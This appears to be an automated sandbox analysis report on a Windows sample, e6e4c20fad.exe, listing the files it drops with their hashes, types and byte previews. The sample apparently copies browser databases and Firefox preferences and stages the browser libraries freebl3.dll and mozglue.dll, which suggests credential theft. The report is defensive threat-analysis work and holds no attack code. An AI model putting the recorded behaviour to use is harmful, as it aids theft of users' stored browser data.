                                                                                                                                                                                                                            Entropy (8bit):1.1373607036346451
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                                                                                                                                                                            MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                                                                                                                                                                            SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                                                                                                                                                                            SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                                                                                                                                                                            SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\ProgramData\ECBGIEHDBAAFIDGDAAAA

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1765), with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):13425
                                                                                                                                                                                                                            Entropy (8bit):5.4721802224568625
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:Nz5neRdIYbBp6nnmUzaXk6aRuKWPakG5RDNBw8dT9mSl:NzPeYmUskDDrwAw0
                                                                                                                                                                                                                            MD5:5D69839AEB3B1BDE5DD23D6F08FBE840
                                                                                                                                                                                                                            SHA1:733F6A51D6103D46B3C34428D76F14C55E4F6E1B
                                                                                                                                                                                                                            SHA-256:976FF29BAEB2FD1B10108A5439AE9E8B29CAAD7E2A2BFA5080C881A7E40A27D1
                                                                                                                                                                                                                            SHA-512:A799664C2E84D76CAA25EAD9956A1834E3F109CFCAF6F37BE824784CFDD25B28720CA45523584F679CA3C33872666B821577CD3EAB22F52CAA22979D8F515A89
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "38829aa4-f57e-4fd8-bfd3-d094d57ae30f");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.backgroundErrors", 2);..user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1735041557);..user_pref("app.update.lastUpdateTime.background-update-timer", 1735041557);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1735041557);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 173504

                                                                                                                                                                                                                            C:\ProgramData\FHIDAFHC

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe
                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):196608
                                                                                                                                                                                                                            Entropy (8bit):1.1209886597424439
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                                                                                                                                                                            MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                                                                                                                                                                            SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                                                                                                                                                                            SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                                                                                                                                                                            SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\ProgramData\FHIECBAFBFHIJKFIJDAKECAAEH

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe
                                                                                                                                                                                                                            File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):5242880
                                                                                                                                                                                                                            Entropy (8bit):0.03708713717387235
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:58rJQaXoMXp0VW9FxW/Hy4XJwvnzfXfYf6zfTfN/0DApVJCI:58r54w0VW3xW/bXWzvACzbJ0DApVJ
                                                                                                                                                                                                                            MD5:85D6E1D7F82C11DAC40C95C06B7B5DC5
                                                                                                                                                                                                                            SHA1:96EA790BA7A295D78AD5A5019D7EA5E9E8F4B0BD
                                                                                                                                                                                                                            SHA-256:D9AD18D2A91CB42FD55695B562D76337BBB4A6AEB45D28C4554297B4EE0DC800
                                                                                                                                                                                                                            SHA-512:5DD2B75138EFB9588E14997D84C23C8225F9BFDCEA6A2A1D542AD2C6728484E7E578F06C4BA238853EAD9BE5F9A7CCCF7B2B49A0583FF93D67F072F2C5165B14
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\ProgramData\IIIJECAEGDHIDHJKKKKF

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe
                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):51200
                                                                                                                                                                                                                            Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0xdbe06cf3, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1048576
                                                                                                                                                                                                                            Entropy (8bit):0.9433601190140423
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:7SB2ESB2SSjlK/ZvxPXK0I9XGJCTgzZYkr3g16zV2UPkLk+kY+lKuy9ny5zPOZ15:7azaHvxXy2V2UR
                                                                                                                                                                                                                            MD5:DC0FA1365BB2DC60D252B878EF12E401
                                                                                                                                                                                                                            SHA1:FC789A1C73D7705E073F29BFDFB6DF23AEAE8DCA
                                                                                                                                                                                                                            SHA-256:FC0255E9CADEE37783666FA335B6DD6678F486569340B99A0D78DBF83AE0F77D
                                                                                                                                                                                                                            SHA-512:C75B0F5F28A14CE69E8E586F962AFADB2122366D542C660FF8F625776B1CF571F8E664268FA4AFA799D50EAEA53A0156FEC46CF28ABFBE761693DCEBEB642803
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:..l.... ...............X\...;...{......................0.x...... ...{s./....|..h.z.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............{...............................................................................................................................................................................................2...{....................................../....|...................HR/....|...........................#......h.z.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_7620ab885d.exe_79c034299c21bc7ef96d0b3eddbd0287019a597_f4fa8b30_d7d3f04d-e593-493b-beee-39f93eeb9e66\Report.wer

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                                            Entropy (8bit):1.0512169575084267
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:YhFdh5CvschYoI7Jf9QXIDcQvc6QcEVcw3cE/X+HbHg/8BRTf3Oy1oVazW0EVs2j:E/Cvb0BU/wjudxAfzuiFVZ24IO83
                                                                                                                                                                                                                            MD5:EC6E1F37C8D8E2057EE8FDEB753B19C4
                                                                                                                                                                                                                            SHA1:C734C6862956D159E43518253DBA984E8537A4FD
                                                                                                                                                                                                                            SHA-256:D5D8C6AA436BEFCD0414A199BD279D171366765CD6E4BB52FE04FD3E4E968C0D
                                                                                                                                                                                                                            SHA-512:5457B041041246709071ADC2355314EABEE187CE58188FA2EE6269CB32525C867F258FE720FA2BC95EF2E60B25ECA437C2A62366C2ADB5D7FC4500C7D2A035F2
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.5.0.9.4.3.2.9.8.8.6.7.8.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.5.0.9.4.3.3.7.2.3.0.4.7.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.7.d.3.f.0.4.d.-.e.5.9.3.-.4.9.3.b.-.b.e.e.e.-.3.9.f.9.3.e.e.b.9.e.6.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.f.3.b.7.3.9.c.-.8.1.3.7.-.4.0.c.6.-.a.4.e.9.-.9.4.1.a.f.8.1.6.1.3.1.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.7.6.2.0.a.b.8.8.5.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.9.9.8.-.0.0.0.1.-.0.0.1.4.-.6.a.a.e.-.6.5.d.7.e.d.5.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.7.f.a.3.7.e.e.6.7.e.f.2.9.d.a.0.9.e.5.8.0.8.8.3.1.9.c.c.4.b.8.0.0.0.0.f.f.f.f.!.0.0.0.0.c.1.7.0.0.c.d.a.1.d.b.d.1.3.4.c.b.c.3.5.3.f.6.a.5.c.7.5.8.6.3.a.3.6.f.f.8.f.e.f.!.7.6.2.0.a.b.8.8.5.d...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER96B1.tmp.dmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:Mini DuMP crash report, 15 streams, Tue Dec 24 10:23:53 2024, 0x1205a4 type
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):285366
                                                                                                                                                                                                                            Entropy (8bit):1.524893223692318
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:bmdBBqxv7sesXYv0GrD/N4resjtdz2WYgxsv/7A/UW:bmQxDsJXQ0GrD/6resj7z2ym/7A/U
                                                                                                                                                                                                                            MD5:E07F718C265F41083672BD0E71A3E5A6
                                                                                                                                                                                                                            SHA1:ED9EC27393AB6267A4F9A0C67C457E512D67FD9E
                                                                                                                                                                                                                            SHA-256:022E44BDF690ADA5165D858027C7A2C85B22ABF660B462AEF4B3D8C99FF55D2E
                                                                                                                                                                                                                            SHA-512:10FC64AF1A43D77348C6BACB1A93FE5D6EA0B05DE6F9944A0E4456E263EF2AFD9F7B854A6BB7E997CA148F84A5A0A10887AC3D4B83D2ED6FF1DA566FE4F95A52
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MDMP..a..... .........jg....................................D....'..........L...........`.......8...........T...........(L...............(...........*..............................................................................eJ......`+......GenuineIntel............T.............jg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER9838.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):8360
                                                                                                                                                                                                                            Entropy (8bit):3.70365129761432
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJFD6Pl6Y+i6SZgmfppprS89b96sfefm:R6lXJx6Pl6YT6SZgmfpf9Zfn
                                                                                                                                                                                                                            MD5:6517DB3BAAD5CC7F8B90861F1028D270
                                                                                                                                                                                                                            SHA1:798B1B8F5C3F08AC15135F7FD439578D86B6D4DF
                                                                                                                                                                                                                            SHA-256:73E8A65D9DA9C0292C294537612F039D58DCFC324856F09712BCD0407C022FCC
                                                                                                                                                                                                                            SHA-512:08989C827CF494F24C60725C79F38CC9ADD368EFBB157399794EA813315C51F28FE440C923A1490EB00D7F50E0974D88412114EA69A0E8B8AE8FB48B30ADAC64
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.4.5.6.<./.P.i.

                                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER9859.tmp.xml

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4624
                                                                                                                                                                                                                            Entropy (8bit):4.495220818547917
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zslJg77aI9M/nWpW8VYYYm8M4JSifLwFAh+q8Jb9/l6cfd:uIjf/I7Ge7VsJXNh0pl6cfd
                                                                                                                                                                                                                            MD5:ACE6BA290E8491CDFDEFB356496AAD2A
                                                                                                                                                                                                                            SHA1:4AE824B91FF7CA6C4C3608444428C66866026CEC
                                                                                                                                                                                                                            SHA-256:C8F1FD72B57BB6BF57590DB8239BB1B454016A529293CED139A2FC90EBA1BB0E
                                                                                                                                                                                                                            SHA-512:4A38CA166CC9B5C2F067999E9E1C7588D83BFB565C3785529B21500E9523CBA75C9D5C3B4BF13537B8D0622A6DCAB096EE38DD6F9D89813597EB90E76E2AA399
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="645206" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                            C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\uninstall_ping_308046B0AF4A39CB_fcb132b0-ad50-4e67-b8d3-89926f27dbbf.json (copy)

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):8056
                                                                                                                                                                                                                            Entropy (8bit):5.186412178080879
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:A99wMXVCVsV3cbhbVbTbfbRbObtbyEl7nzrNJA6unSrDtTkdmSq:A9b5cNhnzFSJTrI1nSrDhkdmv
                                                                                                                                                                                                                            MD5:6B6864DA4E0EB08741DE853BB7ED3F81
                                                                                                                                                                                                                            SHA1:C2FB286A008E1FBDFFB46E6CA1DB4184DB27297F
                                                                                                                                                                                                                            SHA-256:A12395096BA88AD1A8539150C04508B6B46734935D4D407B2775B9FF199953AC
                                                                                                                                                                                                                            SHA-512:11508C59CB4DB4E5B4C849633E709FBA90E98A30EAA73A35E911FC64A4D7162DE5305BDB128EA4A3D69BFEFF7E50ABDBC6B1535C4F7FAA5B2FB682BA14831DF8
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:{"type":"uninstall","id":"fcb132b0-ad50-4e67-b8d3-89926f27dbbf","creationDate":"2024-12-24T11:59:46.980Z","version":4,"application":{"architecture":"x86-64","buildId":"20230927232528","name":"Firefox","version":"118.0.1","displayVersion":"118.0.1","vendor":"Mozilla","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","channel":"release"},"payload":{"otherInstalls":0},"clientId":"965729a8-84e4-4cad-a75d-ac8181902c4b","environment":{"build":{"applicationId":"{ec8030f7-c20a-464f-9b0e-13a3a9e97384}","applicationName":"Firefox","architecture":"x86-64","buildId":"20230927232528","version":"118.0.1","vendor":"Mozilla","displayVersion":"118.0.1","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","updaterAvailable":true},"partner":{"distributionId":null,"distributionVersion":null,"partnerId":null,"distributor":null,"distributorChannel":null,"partnerNames":[]},"system":{"memoryMB":8191,"virtualMaxMB":134217728,"cpu":{"isWindowsSMode":false,"count":4,"cores":2,"vendor":"GenuineIntel","name":"I

                                                                                                                                                                                                                            C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\uninstall_ping_308046B0AF4A39CB_fcb132b0-ad50-4e67-b8d3-89926f27dbbf.json.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):8056
                                                                                                                                                                                                                            Entropy (8bit):5.186412178080879
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:A99wMXVCVsV3cbhbVbTbfbRbObtbyEl7nzrNJA6unSrDtTkdmSq:A9b5cNhnzFSJTrI1nSrDhkdmv
                                                                                                                                                                                                                            MD5:6B6864DA4E0EB08741DE853BB7ED3F81
                                                                                                                                                                                                                            SHA1:C2FB286A008E1FBDFFB46E6CA1DB4184DB27297F
                                                                                                                                                                                                                            SHA-256:A12395096BA88AD1A8539150C04508B6B46734935D4D407B2775B9FF199953AC
                                                                                                                                                                                                                            SHA-512:11508C59CB4DB4E5B4C849633E709FBA90E98A30EAA73A35E911FC64A4D7162DE5305BDB128EA4A3D69BFEFF7E50ABDBC6B1535C4F7FAA5B2FB682BA14831DF8
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:{"type":"uninstall","id":"fcb132b0-ad50-4e67-b8d3-89926f27dbbf","creationDate":"2024-12-24T11:59:46.980Z","version":4,"application":{"architecture":"x86-64","buildId":"20230927232528","name":"Firefox","version":"118.0.1","displayVersion":"118.0.1","vendor":"Mozilla","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","channel":"release"},"payload":{"otherInstalls":0},"clientId":"965729a8-84e4-4cad-a75d-ac8181902c4b","environment":{"build":{"applicationId":"{ec8030f7-c20a-464f-9b0e-13a3a9e97384}","applicationName":"Firefox","architecture":"x86-64","buildId":"20230927232528","version":"118.0.1","vendor":"Mozilla","displayVersion":"118.0.1","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","updaterAvailable":true},"partner":{"distributionId":null,"distributionVersion":null,"partnerId":null,"distributor":null,"distributorChannel":null,"partnerNames":[]},"system":{"memoryMB":8191,"virtualMaxMB":134217728,"cpu":{"isWindowsSMode":false,"count":4,"cores":2,"vendor":"GenuineIntel","name":"I

                                                                                                                                                                                                                            C:\ProgramData\freebl3.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):685392
                                                                                                                                                                                                                            Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                            MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                            SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                            SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                            SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):608080
                                                                                                                                                                                                                            Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                            MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                            SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                            SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                            SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\ProgramData\msvcp140.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):450024
                                                                                                                                                                                                                            Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                            MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                            SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
